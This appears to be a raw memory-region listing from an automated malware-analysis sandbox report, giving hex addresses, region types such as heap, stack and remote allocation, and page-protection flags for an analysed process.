||
25101A91000
|
trusted library allocation
|
page read and write
|
||
25101389000
|
trusted library allocation
|
page read and write
|
||
7FFD346D0000
|
trusted library allocation
|
page read and write
|
||
19961BDB000
|
trusted library allocation
|
page read and write
|
||
2517822D000
|
heap
|
page read and write
|
||
1ABFA406000
|
heap
|
page read and write
|
||
7FFD34740000
|
trusted library allocation
|
page read and write
|
||
1BDAE4E5000
|
heap
|
page read and write
|
||
7FFD346D0000
|
trusted library allocation
|
page read and write
|
||
1C17527A000
|
heap
|
page read and write
|
||
7FFD3474F000
|
trusted library allocation
|
page read and write
|
||
23E01A18000
|
heap
|
page read and write
|
||
2866FB3D000
|
heap
|
page read and write
|
||
6C6E873000
|
stack
|
page read and write
|
||
7FFD34570000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD34720000
|
trusted library allocation
|
page read and write
|
||
1EB65607000
|
heap
|
page execute and read and write
|
||
25101610000
|
trusted library allocation
|
page read and write
|
||
7FFD34690000
|
trusted library allocation
|
page read and write
|
||
25101829000
|
trusted library allocation
|
page read and write
|
||
15EC6219000
|
trusted library allocation
|
page read and write
|
||
251014BD000
|
trusted library allocation
|
page read and write
|
||
251000FC000
|
trusted library allocation
|
page read and write
|
||
FDBFBFF000
|
unkown
|
page read and write
|
||
25101C44000
|
trusted library allocation
|
page read and write
|
||
25101646000
|
trusted library allocation
|
page read and write
|
||
7FFD34641000
|
trusted library allocation
|
page read and write
|
||
1ABF1F5D000
|
trusted library allocation
|
page read and write
|
||
7FFD348D6000
|
trusted library allocation
|
page read and write
|
||
251012B1000
|
trusted library allocation
|
page read and write
|
||
11664FD000
|
stack
|
page read and write
|
||
251767A4000
|
heap
|
page read and write
|
||
7FFD3453C000
|
trusted library allocation
|
page execute and read and write
|
||
23E03A51000
|
trusted library allocation
|
page read and write
|
||
25101C3B000
|
trusted library allocation
|
page read and write
|
||
7FFD3453C000
|
trusted library allocation
|
page execute and read and write
|
||
25101B90000
|
trusted library allocation
|
page read and write
|
||
937D40C000
|
stack
|
page read and write
|
||
7FFD347A0000
|
trusted library allocation
|
page read and write
|
||
23E13A51000
|
trusted library allocation
|
page read and write
|
||
2510171C000
|
trusted library allocation
|
page read and write
|
||
2510189E000
|
trusted library allocation
|
page read and write
|
||
25101520000
|
trusted library allocation
|
page read and write
|
||
1995F882000
|
heap
|
page read and write
|
||
15EB45ED000
|
heap
|
page read and write
|
||
7FFD347A0000
|
trusted library allocation
|
page read and write
|
||
7FFD346C0000
|
trusted library allocation
|
page read and write
|
||
29B57230000
|
heap
|
page read and write
|
||
7FFD347E0000
|
trusted library allocation
|
page read and write
|
||
25101A3C000
|
trusted library allocation
|
page read and write
|
||
251017DF000
|
trusted library allocation
|
page read and write
|
||
251016A6000
|
trusted library allocation
|
page read and write
|
||
2510161B000
|
trusted library allocation
|
page read and write
|
||
7FFD34700000
|
trusted library allocation
|
page read and write
|
||
7FFD3454C000
|
trusted library allocation
|
page execute and read and write
|
||
1BDB032A000
|
trusted library allocation
|
page read and write
|
||
2510192C000
|
trusted library allocation
|
page read and write
|
||
15EB45B2000
|
heap
|
page read and write
|
||
25101B92000
|
trusted library allocation
|
page read and write
|
||
251017F9000
|
trusted library allocation
|
page read and write
|
||
57E75EF000
|
stack
|
page read and write
|
||
1C1751C0000
|
heap
|
page read and write
|
||
7FFD345A0000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD346B0000
|
trusted library allocation
|
page read and write
|
||
2866F82D000
|
heap
|
page read and write
|
||
251014FE000
|
trusted library allocation
|
page read and write
|
||
5BBC87F000
|
stack
|
page read and write
|
||
2866F6A5000
|
heap
|
page read and write
|
||
97C000
|
stack
|
page read and write
|
||
7FFD3453C000
|
trusted library allocation
|
page execute and read and write
|
||
1995F5E0000
|
heap
|
page read and write
|
||
7FFD34675000
|
trusted library allocation
|
page read and write
|
||
491974E000
|
stack
|
page read and write
|
||
2866F673000
|
heap
|
page read and write
|
||
2866FBE6000
|
heap
|
page read and write
|
||
25101B4F000
|
trusted library allocation
|
page read and write
|
||
25101C8E000
|
trusted library allocation
|
page read and write
|
||
25101ADD000
|
trusted library allocation
|
page read and write
|
||
19961BDF000
|
trusted library allocation
|
page read and write
|
||
57E79FE000
|
stack
|
page read and write
|
||
2510165C000
|
trusted library allocation
|
page read and write
|
||
7FFD346C0000
|
trusted library allocation
|
page read and write
|
||
1166A3E000
|
stack
|
page read and write
|
||
251018D4000
|
trusted library allocation
|
page read and write
|
||
1C177565000
|
heap
|
page read and write
|
||
251017F1000
|
trusted library allocation
|
page read and write
|
||
1ABE2D85000
|
trusted library allocation
|
page read and write
|
||
7FFD347D4000
|
trusted library allocation
|
page read and write
|
||
1C176BB0000
|
heap
|
page read and write
|
||
2866D94E000
|
heap
|
page read and write
|
||
25101A31000
|
trusted library allocation
|
page read and write
|
||
7FFD34740000
|
trusted library allocation
|
page read and write
|
||
25101A86000
|
trusted library allocation
|
page read and write
|
||
6C6EC78000
|
stack
|
page read and write
|
||
25101C82000
|
trusted library allocation
|
page read and write
|
||
7FFD346A0000
|
trusted library allocation
|
page read and write
|
||
251019A1000
|
trusted library allocation
|
page read and write
|
||
7FFD34710000
|
trusted library allocation
|
page read and write
|
||
15EC6350000
|
trusted library allocation
|
page read and write
|
||
25101769000
|
trusted library allocation
|
page read and write
|
||
1C175220000
|
trusted library allocation
|
page read and write
|
||
25101C6F000
|
trusted library allocation
|
page read and write
|
||
25101930000
|
trusted library allocation
|
page read and write
|
||
251006F3000
|
trusted library allocation
|
page read and write
|
||
1EB4CE34000
|
heap
|
page read and write
|
||
2866F63D000
|
heap
|
page read and write
|
||
25101C7D000
|
trusted library allocation
|
page read and write
|
||
7FFD346D0000
|
trusted library allocation
|
page read and write
|
||
1ABE008A000
|
heap
|
page read and write
|
||
25101926000
|
trusted library allocation
|
page read and write
|
||
15EC620D000
|
trusted library allocation
|
page read and write
|
||
28653900000
|
heap
|
page read and write
|
||
3FC527E000
|
stack
|
page read and write
|
||
251017A0000
|
trusted library allocation
|
page read and write
|
||
25101429000
|
trusted library allocation
|
page read and write
|
||
25101858000
|
trusted library allocation
|
page read and write
|
||
7FFD34490000
|
trusted library allocation
|
page read and write
|
||
251018AA000
|
trusted library allocation
|
page read and write
|
||
2510197F000
|
trusted library allocation
|
page read and write
|
||
251018C7000
|
trusted library allocation
|
page read and write
|
||
25101B82000
|
trusted library allocation
|
page read and write
|
||
7FFD34720000
|
trusted library allocation
|
page read and write
|
||
1ABE336B000
|
trusted library allocation
|
page read and write
|
||
25101866000
|
trusted library allocation
|
page read and write
|
||
251019F2000
|
trusted library allocation
|
page read and write
|
||
2510136E000
|
trusted library allocation
|
page read and write
|
||
1995F849000
|
heap
|
page read and write
|
||
5BBC5BE000
|
stack
|
page read and write
|
||
25101952000
|
trusted library allocation
|
page read and write
|
||
7FFD346E0000
|
trusted library allocation
|
page read and write
|
||
251015C5000
|
trusted library allocation
|
page read and write
|
||
57E7EBF000
|
stack
|
page read and write
|
||
1ABE2CB9000
|
trusted library allocation
|
page read and write
|
||
7DF49DD90000
|
trusted library allocation
|
page execute and read and write
|
||
1ABFA006000
|
heap
|
page read and write
|
||
251013B4000
|
trusted library allocation
|
page read and write
|
||
1C176BC1000
|
heap
|
page read and write
|
||
474000
|
remote allocation
|
page execute and read and write
|
||
5BBDA4D000
|
stack
|
page read and write
|
||
1ABE2B14000
|
trusted library allocation
|
page read and write
|
||
1BDB1984000
|
trusted library allocation
|
page read and write
|
||
7FFD34760000
|
trusted library allocation
|
page read and write
|
||
1BDB0142000
|
trusted library allocation
|
page read and write
|
||
2510117A000
|
trusted library allocation
|
page read and write
|
||
2866F857000
|
heap
|
page read and write
|
||
19979A90000
|
heap
|
page read and write
|
||
251018BF000
|
trusted library allocation
|
page read and write
|
||
2866D94C000
|
heap
|
page read and write
|
||
1BDB032E000
|
trusted library allocation
|
page read and write
|
||
25101C42000
|
trusted library allocation
|
page read and write
|
||
25101879000
|
trusted library allocation
|
page read and write
|
||
25101667000
|
trusted library allocation
|
page read and write
|
||
7FFD344EC000
|
trusted library allocation
|
page execute and read and write
|
||
6C6EF7F000
|
stack
|
page read and write
|
||
1C176B97000
|
heap
|
page execute and read and write
|
||
491A0BE000
|
stack
|
page read and write
|
||
1C101213000
|
trusted library allocation
|
page read and write
|
||
2510192E000
|
trusted library allocation
|
page read and write
|
||
23E04147000
|
trusted library allocation
|
page read and write
|
||
7FFD346B0000
|
trusted library allocation
|
page read and write
|
||
2511006B000
|
trusted library allocation
|
page read and write
|
||
2866F6DE000
|
heap
|
page read and write
|
||
25101C6D000
|
trusted library allocation
|
page read and write
|
||
6C6EAFF000
|
stack
|
page read and write
|
||
25101589000
|
trusted library allocation
|
page read and write
|
||
23E01B01000
|
heap
|
page read and write
|
||
937C53F000
|
stack
|
page read and write
|
||
1C110001000
|
trusted library allocation
|
page read and write
|
||
116667E000
|
stack
|
page read and write
|
||
15ECE760000
|
heap
|
page read and write
|
||
1EB4B360000
|
heap
|
page read and write
|
||
7FFD34790000
|
trusted library allocation
|
page read and write
|
||
7FFD34780000
|
trusted library allocation
|
page read and write
|
||
1166BBB000
|
stack
|
page read and write
|
||
25101BD4000
|
trusted library allocation
|
page read and write
|
||
1C175230000
|
heap
|
page read and write
|
||
251017D7000
|
trusted library allocation
|
page read and write
|
||
15ECE5A0000
|
heap
|
page read and write
|
||
25101A59000
|
trusted library allocation
|
page read and write
|
||
7FFD345B0000
|
trusted library allocation
|
page execute and read and write
|
||
251789E2000
|
heap
|
page read and write
|
||
7FFD34740000
|
trusted library allocation
|
page read and write
|
||
7FFD34730000
|
trusted library allocation
|
page read and write
|
||
7FFD346C0000
|
trusted library allocation
|
page read and write
|
||
1BDC83E8000
|
heap
|
page read and write
|
||
25101B2B000
|
trusted library allocation
|
page read and write
|
||
1BDAE2A0000
|
heap
|
page read and write
|
||
1C175270000
|
heap
|
page read and write
|
||
2866D94E000
|
heap
|
page read and write
|
||
7FFD34692000
|
trusted library allocation
|
page read and write
|
||
251019FA000
|
trusted library allocation
|
page read and write
|
||
199611E0000
|
trusted library allocation
|
page read and write
|
||
23E13AC8000
|
trusted library allocation
|
page read and write
|
||
25101B14000
|
trusted library allocation
|
page read and write
|
||
5BBD94E000
|
stack
|
page read and write
|
||
251767A2000
|
heap
|
page read and write
|
||
25101690000
|
trusted library allocation
|
page read and write
|
||
7FFD34546000
|
trusted library allocation
|
page read and write
|
||
251016C8000
|
trusted library allocation
|
page read and write
|
||
2866D94B000
|
heap
|
page read and write
|
||
2866F866000
|
heap
|
page read and write
|
||
2510172D000
|
trusted library allocation
|
page read and write
|
||
25101803000
|
trusted library allocation
|
page read and write
|
||
1C1004CE000
|
trusted library allocation
|
page read and write
|
||
937C63E000
|
stack
|
page read and write
|
||
25101A1D000
|
trusted library allocation
|
page read and write
|
||
1BDAE4E0000
|
heap
|
page read and write
|
||
7FFD34740000
|
trusted library allocation
|
page read and write
|
||
25101BA5000
|
trusted library allocation
|
page read and write
|
||
251016D3000
|
trusted library allocation
|
page read and write
|
||
7FFD346C0000
|
trusted library allocation
|
page read and write
|
||
15ECE56A000
|
heap
|
page read and write
|
||
25101AC7000
|
trusted library allocation
|
page read and write
|
||
4919C7F000
|
stack
|
page read and write
|
||
25101AEF000
|
trusted library allocation
|
page read and write
|
||
25101981000
|
trusted library allocation
|
page read and write
|
||
327F000
|
stack
|
page read and write
|
||
25176710000
|
heap
|
page read and write
|
||
1ABE2DE7000
|
trusted library allocation
|
page read and write
|
||
2510181D000
|
trusted library allocation
|
page read and write
|
||
251016E8000
|
trusted library allocation
|
page read and write
|
||
1C177230000
|
heap
|
page read and write
|
||
7FFD34640000
|
trusted library allocation
|
page execute and read and write
|
||
1EB4B47F000
|
heap
|
page read and write
|
||
1BDB19EA000
|
trusted library allocation
|
page read and write
|
||
7FFD34530000
|
trusted library allocation
|
page read and write
|
||
10B0000
|
heap
|
page read and write
|
||
25101BBC000
|
trusted library allocation
|
page read and write
|
||
25101A8C000
|
trusted library allocation
|
page read and write
|
||
1EB6575F000
|
heap
|
page read and write
|
||
25101341000
|
trusted library allocation
|
page read and write
|
||
25101C28000
|
trusted library allocation
|
page read and write
|
||
2510198A000
|
trusted library allocation
|
page read and write
|
||
25101B21000
|
trusted library allocation
|
page read and write
|
||
199798A4000
|
heap
|
page read and write
|
||
1BDB0326000
|
trusted library allocation
|
page read and write
|
||
1BDAE480000
|
trusted library allocation
|
page read and write
|
||
25101B5F000
|
trusted library allocation
|
page read and write
|
||
251017CF000
|
trusted library allocation
|
page read and write
|
||
1EB65600000
|
heap
|
page execute and read and write
|
||
25101416000
|
trusted library allocation
|
page read and write
|
||
937C37F000
|
stack
|
page read and write
|
||
25101C9F000
|
trusted library allocation
|
page read and write
|
||
15EB6150000
|
heap
|
page execute and read and write
|
||
1166ABE000
|
stack
|
page read and write
|
||
1EB65350000
|
heap
|
page read and write
|
||
251017F3000
|
trusted library allocation
|
page read and write
|
||
29B5725A000
|
heap
|
page read and write
|
||
25101295000
|
trusted library allocation
|
page read and write
|
||
15ECE771000
|
heap
|
page read and write
|
||
251013A6000
|
trusted library allocation
|
page read and write
|
||
25101AC9000
|
trusted library allocation
|
page read and write
|
||
15EB7674000
|
trusted library allocation
|
page read and write
|
||
25101371000
|
trusted library allocation
|
page read and write
|
||
23E04131000
|
trusted library allocation
|
page read and write
|
||
25101805000
|
trusted library allocation
|
page read and write
|
||
7FFD347B0000
|
trusted library allocation
|
page read and write
|
||
2866F891000
|
heap
|
page read and write
|
||
1BDAFD80000
|
heap
|
page execute and read and write
|
||
1EB4DE15000
|
trusted library allocation
|
page read and write
|
||
1EB6537F000
|
heap
|
page read and write
|
||
7FFD34494000
|
trusted library allocation
|
page read and write
|
||
7FFD3466A000
|
trusted library allocation
|
page read and write
|
||
1C177489000
|
heap
|
page read and write
|
||
1BDAFF95000
|
trusted library allocation
|
page read and write
|
||
25101A9E000
|
trusted library allocation
|
page read and write
|
||
25101840000
|
trusted library allocation
|
page read and write
|
||
25101A24000
|
trusted library allocation
|
page read and write
|
||
7FFD34622000
|
trusted library allocation
|
page read and write
|
||
25101BBE000
|
trusted library allocation
|
page read and write
|
||
251017AA000
|
trusted library allocation
|
page read and write
|
||
1BDB0311000
|
trusted library allocation
|
page read and write
|
||
7FFD347E0000
|
trusted library allocation
|
page read and write
|
||
29B57490000
|
heap
|
page read and write
|
||
25101AFD000
|
trusted library allocation
|
page read and write
|
||
7FFD34576000
|
trusted library allocation
|
page execute and read and write
|
||
251019B5000
|
trusted library allocation
|
page read and write
|
||
1EB4CE70000
|
trusted library allocation
|
page read and write
|
||
251013B7000
|
trusted library allocation
|
page read and write
|
||
25101CA9000
|
trusted library allocation
|
page read and write
|
||
15EB6228000
|
trusted library allocation
|
page read and write
|
||
25101BAC000
|
trusted library allocation
|
page read and write
|
||
15EB7A8D000
|
trusted library allocation
|
page read and write
|
||
1C101DFF000
|
trusted library allocation
|
page read and write
|
||
25101B08000
|
trusted library allocation
|
page read and write
|
||
25101941000
|
trusted library allocation
|
page read and write
|
||
25178750000
|
heap
|
page read and write
|
||
F5EDDFF000
|
stack
|
page read and write
|
||
1C100BF7000
|
trusted library allocation
|
page read and write
|
||
1ABE0053000
|
heap
|
page read and write
|
||
1ABFA3A9000
|
heap
|
page read and write
|
||
2866F674000
|
heap
|
page read and write
|
||
25101380000
|
trusted library allocation
|
page read and write
|
||
7FFD347B0000
|
trusted library allocation
|
page read and write
|
||
251011FE000
|
trusted library allocation
|
page read and write
|
||
25101CC6000
|
trusted library allocation
|
page read and write
|
||
25101A19000
|
trusted library allocation
|
page read and write
|
||
15EB602D000
|
heap
|
page read and write
|
||
25176789000
|
heap
|
page read and write
|
||
251013FA000
|
trusted library allocation
|
page read and write
|
||
25100248000
|
trusted library allocation
|
page read and write
|
||
23E01B05000
|
heap
|
page read and write
|
||
7FFD34650000
|
trusted library allocation
|
page execute and read and write
|
||
15EB45A8000
|
heap
|
page read and write
|
||
1C110021000
|
trusted library allocation
|
page read and write
|
||
25101A66000
|
trusted library allocation
|
page read and write
|
||
251019F6000
|
trusted library allocation
|
page read and write
|
||
1ABFA110000
|
heap
|
page read and write
|
||
25101AED000
|
trusted library allocation
|
page read and write
|
||
1ABE1FAD000
|
trusted library allocation
|
page read and write
|
||
25101A26000
|
trusted library allocation
|
page read and write
|
||
251014EA000
|
trusted library allocation
|
page read and write
|
||
1BDC852B000
|
heap
|
page read and write
|
||
25101C1A000
|
trusted library allocation
|
page read and write
|
||
251019C6000
|
trusted library allocation
|
page read and write
|
||
23E1BB9C000
|
heap
|
page read and write
|
||
F5EDBFE000
|
stack
|
page read and write
|
||
23E01A63000
|
heap
|
page read and write
|
||
471000
|
remote allocation
|
page execute and read and write
|
||
1BDC8574000
|
heap
|
page read and write
|
||
25101AB7000
|
trusted library allocation
|
page read and write
|
||
1ABF9AEA000
|
heap
|
page read and write
|
||
15EB4629000
|
heap
|
page read and write
|
||
19961C03000
|
trusted library allocation
|
page read and write
|
||
29B57234000
|
heap
|
page read and write
|
||
7FFD34680000
|
trusted library allocation
|
page execute and read and write
|
||
2866F8F4000
|
heap
|
page read and write
|
||
25101638000
|
trusted library allocation
|
page read and write
|
||
25101723000
|
trusted library allocation
|
page read and write
|
||
251017E3000
|
trusted library allocation
|
page read and write
|
||
251019EB000
|
trusted library allocation
|
page read and write
|
||
7FFD348D0000
|
trusted library allocation
|
page read and write
|
||
15EB488E000
|
heap
|
page read and write
|
||
1ABE0170000
|
trusted library allocation
|
page read and write
|
||
2510191D000
|
trusted library allocation
|
page read and write
|
||
15EB7D10000
|
trusted library allocation
|
page read and write
|
||
7FFD3479F000
|
trusted library allocation
|
page read and write
|
||
25101854000
|
trusted library allocation
|
page read and write
|
||
7FFD346A0000
|
trusted library allocation
|
page read and write
|
||
25101BA0000
|
trusted library allocation
|
page read and write
|
||
2866F882000
|
heap
|
page read and write
|
||
251019D1000
|
trusted library allocation
|
page read and write
|
||
E2B000
|
heap
|
page read and write
|
||
25101A4A000
|
trusted library allocation
|
page read and write
|
||
7FFD34536000
|
trusted library allocation
|
page read and write
|
||
25101C21000
|
trusted library allocation
|
page read and write
|
||
7FFD347C0000
|
trusted library allocation
|
page read and write
|
||
7FFD34790000
|
trusted library allocation
|
page read and write
|
||
1C176D77000
|
heap
|
page read and write
|
||
1EB4B3D0000
|
heap
|
page read and write
|
||
2510148D000
|
trusted library allocation
|
page read and write
|
||
7FFD344B0000
|
trusted library allocation
|
page read and write
|
||
2510166B000
|
trusted library allocation
|
page read and write
|
||
25101BFE000
|
trusted library allocation
|
page read and write
|
||
25101C4C000
|
trusted library allocation
|
page read and write
|
||
1C176DB7000
|
heap
|
page read and write
|
||
25101534000
|
trusted library allocation
|
page read and write
|
||
7FFD347F0000
|
trusted library allocation
|
page read and write
|
||
1C1775AC000
|
heap
|
page read and write
|
||
1BDC8500000
|
heap
|
page read and write
|
||
1ABE2AE8000
|
trusted library allocation
|
page read and write
|
||
25101A93000
|
trusted library allocation
|
page read and write
|
||
25101943000
|
trusted library allocation
|
page read and write
|
||
57E7562000
|
stack
|
page read and write
|
||
199611D0000
|
heap
|
page readonly
|
||
6C6EB7E000
|
stack
|
page read and write
|
||
7FFD34540000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD348F0000
|
trusted library allocation
|
page read and write
|
||
1ABF9FAE000
|
heap
|
page read and write
|
||
23E1BDD8000
|
heap
|
page read and write
|
||
2866F5E1000
|
heap
|
page read and write
|
||
7FFD34680000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD347FC000
|
trusted library allocation
|
page read and write
|
||
2866F65F000
|
heap
|
page read and write
|
||
1ABF1B01000
|
trusted library allocation
|
page read and write
|
||
7FFD34483000
|
trusted library allocation
|
page execute and read and write
|
||
251019C4000
|
trusted library allocation
|
page read and write
|
||
1BDB19AA000
|
trusted library allocation
|
page read and write
|
||
251014ED000
|
trusted library allocation
|
page read and write
|
||
1C177495000
|
heap
|
page read and write
|
||
1ABFA3F3000
|
heap
|
page read and write
|
||
1C176D30000
|
heap
|
page read and write
|
||
251016CE000
|
trusted library allocation
|
page read and write
|
||
2866F604000
|
heap
|
page read and write
|
||
7FFD34540000
|
trusted library allocation
|
page read and write
|
||
7FFD34631000
|
trusted library allocation
|
page read and write
|
||
7FFD346A8000
|
trusted library allocation
|
page read and write
|
||
6C6F07B000
|
stack
|
page read and write
|
||
2866F8E7000
|
heap
|
page read and write
|
||
7FFD34546000
|
trusted library allocation
|
page read and write
|
||
2510125A000
|
trusted library allocation
|
page read and write
|
||
25101798000
|
trusted library allocation
|
page read and write
|
||
2510193B000
|
trusted library allocation
|
page read and write
|
||
251009A2000
|
trusted library allocation
|
page read and write
|
||
2510185C000
|
trusted library allocation
|
page read and write
|
||
2510098C000
|
trusted library allocation
|
page read and write
|
||
3FC53FB000
|
stack
|
page read and write
|
||
7FFD34680000
|
trusted library allocation
|
page execute and read and write
|
||
1BDB199A000
|
trusted library allocation
|
page read and write
|
||
7FFD346C0000
|
trusted library allocation
|
page read and write
|
||
7FFD34700000
|
trusted library allocation
|
page read and write
|
||
2510141E000
|
trusted library allocation
|
page read and write
|
||
1ABDFFB0000
|
heap
|
page read and write
|
||
7FFD347E9000
|
trusted library allocation
|
page read and write
|
||
25101819000
|
trusted library allocation
|
page read and write
|
||
7FFD34770000
|
trusted library allocation
|
page read and write
|
||
937D30E000
|
stack
|
page read and write
|
||
25101470000
|
trusted library allocation
|
page read and write
|
||
2866F699000
|
heap
|
page read and write
|
||
25101278000
|
trusted library allocation
|
page read and write
|
||
7FFD348E0000
|
trusted library allocation
|
page read and write
|
||
2510187D000
|
trusted library allocation
|
page read and write
|
||
251018FA000
|
trusted library allocation
|
page read and write
|
||
1ABFA2ED000
|
heap
|
page read and write
|
||
25101B39000
|
trusted library allocation
|
page read and write
|
||
1C177320000
|
heap
|
page execute and read and write
|
||
251011B9000
|
trusted library allocation
|
page read and write
|
||
2866F810000
|
heap
|
page read and write
|
||
25101945000
|
trusted library allocation
|
page read and write
|
||
25101590000
|
trusted library allocation
|
page read and write
|
||
1EB5D3BD000
|
trusted library allocation
|
page read and write
|
||
1ABFA378000
|
heap
|
page read and write
|
||
25101CBA000
|
trusted library allocation
|
page read and write
|
||
25101456000
|
trusted library allocation
|
page read and write
|
||
25178837000
|
heap
|
page read and write
|
||
25101685000
|
trusted library allocation
|
page read and write
|
||
1BDB16A3000
|
trusted library allocation
|
page read and write
|
||
25101956000
|
trusted library allocation
|
page read and write
|
||
15ECE5E7000
|
heap
|
page execute and read and write
|
||
15EB5F10000
|
trusted library allocation
|
page read and write
|
||
F5ED7DA000
|
stack
|
page read and write
|
||
2866FB11000
|
heap
|
page read and write
|
||
1EB4B4BA000
|
heap
|
page read and write
|
||
7FFD345B0000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD348F0000
|
trusted library allocation
|
page read and write
|
||
1EB65752000
|
heap
|
page read and write
|
||
2866F6DE000
|
heap
|
page read and write
|
||
F5EDAFE000
|
stack
|
page read and write
|
||
2510187B000
|
trusted library allocation
|
page read and write
|
||
25101603000
|
trusted library allocation
|
page read and write
|
||
1C101780000
|
trusted library allocation
|
page read and write
|
||
251011E8000
|
trusted library allocation
|
page read and write
|
||
2510175D000
|
trusted library allocation
|
page read and write
|
||
5BBC5FE000
|
stack
|
page read and write
|
||
251015EA000
|
trusted library allocation
|
page read and write
|
||
7FFD346B0000
|
trusted library allocation
|
page read and write
|
||
7FFD34760000
|
trusted library allocation
|
page read and write
|
||
7FFD34790000
|
trusted library allocation
|
page read and write
|
||
7FFD344B2000
|
trusted library allocation
|
page read and write
|
||
2510170A000
|
trusted library allocation
|
page read and write
|
||
251767EC000
|
heap
|
page read and write
|
||
251017A8000
|
trusted library allocation
|
page read and write
|
||
1EB4D351000
|
trusted library allocation
|
page read and write
|
||
15EB7A50000
|
trusted library allocation
|
page read and write
|
||
1ABF9F5F000
|
heap
|
page read and write
|
||
23E1BB60000
|
heap
|
page read and write
|
||
2510185A000
|
trusted library allocation
|
page read and write
|
||
251018F5000
|
trusted library allocation
|
page read and write
|
||
25178200000
|
trusted library allocation
|
page read and write
|
||
1EB4B4BE000
|
heap
|
page read and write
|
||
25101B36000
|
trusted library allocation
|
page read and write
|
||
2866F5E7000
|
heap
|
page read and write
|
||
1BDB0440000
|
trusted library allocation
|
page read and write
|
||
25176812000
|
heap
|
page read and write
|
||
4919EB9000
|
stack
|
page read and write
|
||
25101B9E000
|
trusted library allocation
|
page read and write
|
||
2866F673000
|
heap
|
page read and write
|
||
7FFD34760000
|
trusted library allocation
|
page read and write
|
||
937C4F9000
|
stack
|
page read and write
|
||
1C176BB4000
|
heap
|
page read and write
|
||
25101574000
|
trusted library allocation
|
page read and write
|
||
2510149A000
|
trusted library allocation
|
page read and write
|
||
25101597000
|
trusted library allocation
|
page read and write
|
||
7FFD346C0000
|
trusted library allocation
|
page read and write
|
||
25101A76000
|
trusted library allocation
|
page read and write
|
||
2510153B000
|
trusted library allocation
|
page read and write
|
||
7FFD347B0000
|
trusted library allocation
|
page read and write
|
||
23E03A40000
|
heap
|
page read and write
|
||
7FFD34770000
|
trusted library allocation
|
page read and write
|
||
1ABFA119000
|
heap
|
page read and write
|
||
7FFD34674000
|
trusted library allocation
|
page read and write
|
||
25101C11000
|
trusted library allocation
|
page read and write
|
||
15EB61A1000
|
trusted library allocation
|
page read and write
|
||
2866F1A0000
|
heap
|
page read and write
|
||
1995F785000
|
heap
|
page read and write
|
||
25101615000
|
trusted library allocation
|
page read and write
|
||
23E03550000
|
trusted library allocation
|
page read and write
|
||
251012A3000
|
trusted library allocation
|
page read and write
|
||
7FFD34620000
|
trusted library allocation
|
page read and write
|
||
251018C1000
|
trusted library allocation
|
page read and write
|
||
3FC4F7E000
|
stack
|
page read and write
|
||
7FFD346D0000
|
trusted library allocation
|
page read and write
|
||
7FFD347B0000
|
trusted library allocation
|
page read and write
|
||
25101BF4000
|
trusted library allocation
|
page read and write
|
||
251015C1000
|
trusted library allocation
|
page read and write
|
||
251015AE000
|
trusted library allocation
|
page read and write
|
||
25101CB2000
|
trusted library allocation
|
page read and write
|
||
25101A28000
|
trusted library allocation
|
page read and write
|
||
1995F843000
|
heap
|
page read and write
|
||
25110010000
|
trusted library allocation
|
page read and write
|
||
937C8BE000
|
stack
|
page read and write
|
||
251014E3000
|
trusted library allocation
|
page read and write
|
||
4919CF8000
|
stack
|
page read and write
|
||
F6F8D7E000
|
stack
|
page read and write
|
||
23E01980000
|
heap
|
page read and write
|
||
25101582000
|
trusted library allocation
|
page read and write
|
||
7FFD347EC000
|
trusted library allocation
|
page read and write
|
||
19961E07000
|
trusted library allocation
|
page read and write
|
||
25101514000
|
trusted library allocation
|
page read and write
|
||
7FFD34546000
|
trusted library allocation
|
page read and write
|
||
25101881000
|
trusted library allocation
|
page read and write
|
||
FD0000
|
heap
|
page read and write
|
||
251017D1000
|
trusted library allocation
|
page read and write
|
||
1C1011D6000
|
trusted library allocation
|
page read and write
|
||
15EB4884000
|
heap
|
page read and write
|
||
2510156D000
|
trusted library allocation
|
page read and write
|
||
25101B99000
|
trusted library allocation
|
page read and write
|
||
251016D5000
|
trusted library allocation
|
page read and write
|
||
29B57220000
|
heap
|
page read and write
|
||
25101CD4000
|
trusted library allocation
|
page read and write
|
||
25101AB9000
|
trusted library allocation
|
page read and write
|
||
2510137D000
|
trusted library allocation
|
page read and write
|
||
1EB4B46F000
|
heap
|
page read and write
|
||
25178110000
|
heap
|
page read and write
|
||
2866D945000
|
heap
|
page read and write
|
||
7FFD34550000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD344B3000
|
trusted library allocation
|
page execute and read and write
|
||
2866D900000
|
heap
|
page read and write
|
||
2866D710000
|
heap
|
page read and write
|
||
1BDAFDCF000
|
heap
|
page read and write
|
||
7FFD34668000
|
trusted library allocation
|
page read and write
|
||
2866F5E0000
|
heap
|
page read and write
|
||
1BDB1A0C000
|
trusted library allocation
|
page read and write
|
||
2866FB3D000
|
heap
|
page read and write
|
||
23E019C5000
|
heap
|
page read and write
|
||
2866F89F000
|
heap
|
page read and write
|
||
5BBCB77000
|
stack
|
page read and write
|
||
7FFD34480000
|
trusted library allocation
|
page read and write
|
||
5BBCD7E000
|
stack
|
page read and write
|
||
5BBCA7D000
|
stack
|
page read and write
|
||
25100510000
|
trusted library allocation
|
page read and write
|
||
7FFD3464A000
|
trusted library allocation
|
page read and write
|
||
7FFD34700000
|
trusted library allocation
|
page read and write
|
||
25176720000
|
heap
|
page read and write
|
||
1BDAE470000
|
heap
|
page readonly
|
||
1EB4CE10000
|
trusted library allocation
|
page read and write
|
||
7FFD34641000
|
trusted library allocation
|
page read and write
|
||
251019C0000
|
trusted library allocation
|
page read and write
|
||
19961590000
|
trusted library allocation
|
page read and write
|
||
7FFD34632000
|
trusted library allocation
|
page read and write
|
||
7FFD34750000
|
trusted library allocation
|
page read and write
|
||
25101523000
|
trusted library allocation
|
page read and write
|
||
2A80000
|
heap
|
page read and write
|
||
25176740000
|
heap
|
page read and write
|
||
7FFD34790000
|
trusted library allocation
|
page read and write
|
||
2866D940000
|
heap
|
page read and write
|
||
19961711000
|
trusted library allocation
|
page read and write
|
||
1EB65710000
|
heap
|
page read and write
|
||
1ABE0062000
|
heap
|
page read and write
|
||
1C1774CC000
|
heap
|
page read and write
|
||
2517877D000
|
heap
|
page read and write
|
||
7FFD34710000
|
trusted library allocation
|
page read and write
|
||
19961BB6000
|
trusted library allocation
|
page read and write
|
||
7FFD34661000
|
trusted library allocation
|
page read and write
|
||
23E1BBD6000
|
heap
|
page read and write
|
||
2866FBE6000
|
heap
|
page read and write
|
||
